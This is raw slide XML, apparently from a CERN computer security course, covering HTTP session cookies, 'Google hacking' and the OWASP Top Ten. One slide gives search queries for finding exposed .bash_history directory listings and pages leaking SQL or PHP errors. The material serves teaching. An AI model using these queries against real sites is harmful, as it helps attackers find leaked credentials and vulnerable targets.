          </a:xfrm>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="75780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19200" y="1290638"/>
            <a:ext cx="923925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-61913" y="1214438"/>
            <a:ext cx="1620838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en-US"/>
              <a:t>Web browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>(IE, Firefox…)</a:t>
            </a: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7143750" y="1211263"/>
            <a:ext cx="1762125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Web server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>(Apache, IIS…)</a:t>
            </a:r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2290763" y="1119188"/>
            <a:ext cx="3876675" cy="5078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>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>GET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> /index.html HTTP/1.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>HTTP/1.1 200 OK</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>POST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> login.php HTTP/1.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Referer: index.html</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[…]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>username=abc&amp;password=def</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>HTTP/1.1 200 OK</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Set-Cookie: SessionId=87325</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>GET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> /list.php?id=3 HTTP/1.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Cookie: SessionId=87325</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>HTTP/1.1 200 OK</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="21" name="Straight Arrow Connector 20"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2381250" y="1428750"/>
            <a:ext cx="3786188" cy="1588"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:headEnd type="none" w="med" len="med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>
            <a:off x="2381250" y="2019300"/>
            <a:ext cx="3786188" cy="1588"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:headEnd type="triangle" w="lg" len="lg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/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2381250" y="3603625"/>
            <a:ext cx="3786188" cy="1588"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:headEnd type="none" w="med" len="med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/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2381250" y="4460875"/>
            <a:ext cx="3786188" cy="1588"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:headEnd type="triangle" w="lg" len="lg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8" name="Object 8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38688" y="3865563"/>
            <a:ext cx="357187" cy="357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19200" y="3576638"/>
            <a:ext cx="923925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99213" y="3514725"/>
            <a:ext cx="66675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42" name="Straight Arrow Connector 41"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2381250" y="5511800"/>
            <a:ext cx="3786188" cy="1588"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:headEnd type="none" w="med" len="med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/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2381250" y="6110288"/>
            <a:ext cx="3786188" cy="1587"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:headEnd type="triangle" w="lg" len="lg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9" name="Object 9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38688" y="1668463"/>
            <a:ext cx="357187" cy="357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8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05563" y="5286375"/>
            <a:ext cx="66675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19200" y="5219700"/>
            <a:ext cx="923925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0" name="Object 10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38688" y="5740400"/>
            <a:ext cx="357187" cy="357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5787" name="Picture 11" descr="C:\Sebastian\ComputerSecurity\my presentations\2009.04 - CERN course\materials\php-logo.gi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358188" y="3857625"/>
            <a:ext cx="657225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55" name="Straight Arrow Connector 54"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7143750" y="3786188"/>
            <a:ext cx="1214438" cy="1587"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:headEnd type="none" w="med" len="med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Arrow Connector 56"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7143750" y="4214813"/>
            <a:ext cx="1143000" cy="1587"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:headEnd type="triangle" w="lg" len="lg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1" name="Object 1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596188" y="4048125"/>
            <a:ext cx="357187" cy="357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3" name="TextBox 62"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7037388" y="3168650"/>
            <a:ext cx="179705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Executing PHP </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>login.php</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="72" name="Picture 11" descr="C:\Sebastian\ComputerSecurity\my presentations\2009.04 - CERN course\materials\php-logo.gi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358188" y="5629275"/>
            <a:ext cx="657225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73" name="Straight Arrow Connector 72"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7143750" y="5570538"/>
            <a:ext cx="1214438" cy="1587"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:headEnd type="none" w="med" len="med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Straight Arrow Connector 73"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7143750" y="5999163"/>
            <a:ext cx="1143000" cy="1587"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:headEnd type="triangle" w="lg" len="lg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2" name="Object 1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597775" y="5843588"/>
            <a:ext cx="357188" cy="357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57" name="Picture 33" descr="C:\Sebastian\ComputerSecurity\my presentations\2009.04 - CERN course\materials\javascript_icon.gif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786688" y="6000750"/>
            <a:ext cx="25717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" name="Picture 33" descr="C:\Sebastian\ComputerSecurity\my presentations\2009.04 - CERN course\materials\javascript_icon.gif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919663" y="5910263"/>
            <a:ext cx="25717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" name="Freeform 40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="642938" y="5429250"/>
            <a:ext cx="550862" cy="508000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 550333 w 550333"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 508000"/>
              <a:gd name="connsiteX1" fmla="*/ 4233 w 550333"/>
              <a:gd name="connsiteY1" fmla="*/ 292100 h 508000"/>
              <a:gd name="connsiteX2" fmla="*/ 524933 w 550333"/>
              <a:gd name="connsiteY2" fmla="*/ 508000 h 50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50333" h="508000">
                <a:moveTo>
                  <a:pt x="550333" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="279399" y="103716"/>
                  <a:pt x="8466" y="207433"/>
                  <a:pt x="4233" y="292100"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="376767"/>
                  <a:pt x="262466" y="442383"/>
                  <a:pt x="524933" y="508000"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:headEnd type="none" w="med" len="med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44" name="TextBox 43"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="74613" y="4786313"/>
            <a:ext cx="126206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executing </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="49" name="Picture 33" descr="C:\Sebastian\ComputerSecurity\my presentations\2009.04 - CERN course\materials\javascript_icon.gif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285875" y="5286375"/>
            <a:ext cx="25717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2306695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6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1000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="6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9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2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7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1000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="8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8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2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2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2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2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2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10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>
                      <p:stCondLst>
                        <p:cond delay="indefinite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4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1" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="1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3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 animBg="1"/>
      <p:bldP spid="47" grpId="0" animBg="1"/>
      <p:bldP spid="45" grpId="0" animBg="1"/>
      <p:bldP spid="7" grpId="0"/>
      <p:bldP spid="8" grpId="0"/>
      <p:bldP spid="63" grpId="0"/>
      <p:bldP spid="4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Google hacking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en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Finding (potentially) vulnerable Web sites</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>is easy with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Google hacking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="266700" lvl="1" indent="-266700">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Use special search operators: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>(more at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://google.com/help/operators.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="622300" lvl="1" indent="-266700">
              <a:tabLst>
                <a:tab pos="5918200" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>only from given domain (e.g. abc.com):	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>site:abc.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="622300" lvl="1" indent="-266700">
              <a:tabLst>
                <a:tab pos="5918200" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>only given file extension (e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>pdf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>):	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>filetype:pdf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="622300" lvl="1" indent="-266700">
              <a:tabLst>
                <a:tab pos="5918200" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>given word (e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>secret</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>) in page title:	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>intitle:secret</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="622300" lvl="1" indent="-266700">
              <a:tabLst>
                <a:tab pos="5918200" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>given word (e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>upload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>) in page URL:	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>inurl:upload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 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Run a Google search for:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="622300" lvl="1" indent="-266700">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>intitle:index.of</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>bash_history</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="622300" lvl="1" indent="-266700">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pP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-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>inurl:https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 login</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="622300" lvl="1" indent="-266700">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pP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"Cannot modify header information"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="622300" lvl="1" indent="-266700">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pP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"ORA-00933: SQL command not properly ended" </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Thousands of queries possible! (look for GHDB, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>Wikto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a: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 rot="900000">
            <a:off x="5584825" y="4729163"/>
            <a:ext cx="3521075" cy="763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300"/>
              <a:t>for your favourite domain:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>site:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>domain.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="79877" name="Picture 5" descr="C:\Sebastian\CERN\lhc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05563" y="1071563"/>
            <a:ext cx="2640012" cy="100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7696224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OWASP Top Ten</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7987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CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OWASP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> (Open Web Application Security Project)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Top Ten flaws</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://owasp.org/index.php/Category:OWASP_Top_Ten_Project</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:tabLst>
                <a:tab pos="1344613" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	Injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="CC3300"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:tabLst>
                <a:tab pos="1344613" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	Broken </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Authentication and Session Management</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:tabLst>
                <a:tab pos="1344613" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	Cross</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-Site Scripting (XSS)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:tabLst>
                <a:tab pos="1344613" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	Insecure </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Direct Object References</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:tabLst>
                <a:tab pos="1344613" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A5 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	Security </a:t>
            </a:r>
            <a:r>
